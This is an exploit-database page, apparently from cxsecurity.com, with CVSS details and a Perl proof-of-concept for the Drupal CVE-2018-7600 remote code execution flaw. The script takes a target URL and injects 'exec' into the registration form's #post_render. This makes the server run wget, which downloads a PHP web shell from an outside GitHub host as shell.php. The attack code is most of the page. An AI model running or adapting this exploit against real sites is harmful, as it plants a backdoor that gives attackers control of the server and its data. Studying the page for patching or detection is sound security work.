Drupal 0day Remote PHP Code Execution (Perl)

2018.04.14
ir GIST (IR) ir
Risk: High
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl # Title : Drupal 0day Remote PHP Code Execution (Perl) # Author = GIST # date : 14 April 2018 # CVE : CVE-2018-7600 # Vendor : https://www.drupal.org/ # Tested on : Ubuntu use LWP::Simple; use LWP::UserAgent; my $ua = LWP::UserAgent->new; system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print <<logo; ____ _ _____ _ _ _ | \ ___ _ _ ___ ___| | | __|_ _ ___| |___|_| |_ ___ ___ | | | _| | | . | .'| | | __|_'_| . | | . | | _| -_| _| |____/|_| |___| _|__,|_| |_____|_,_| _|_|___|_|_| |___|_| |_| |_| logo print "\nEnter Your Target URL > "; $url=<>; chomp($url); $exploit = "$url/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"; $ajax = "_drupa_ajax"; $mail = "mail[#post_render][]"; $maill= "mail[#type]"; $mailll = "mail[#markup]"; $wget = "wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php -0 shell.php"; $response = $ua->post($exploit, Content-Type => 'multipart/form-data', Content => [form_id => 'user_register_form', $ajax => '1', $mail => 'exec', $maill => 'markup', $mailll => $wget]); if ($response =~ /200/) { print "\nPayload Uploaded successfully $url/shell.php\n"; } else{ print "\nTarget Is Not Vulnerable\n"; }


Vote for this issue:
53%
47%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top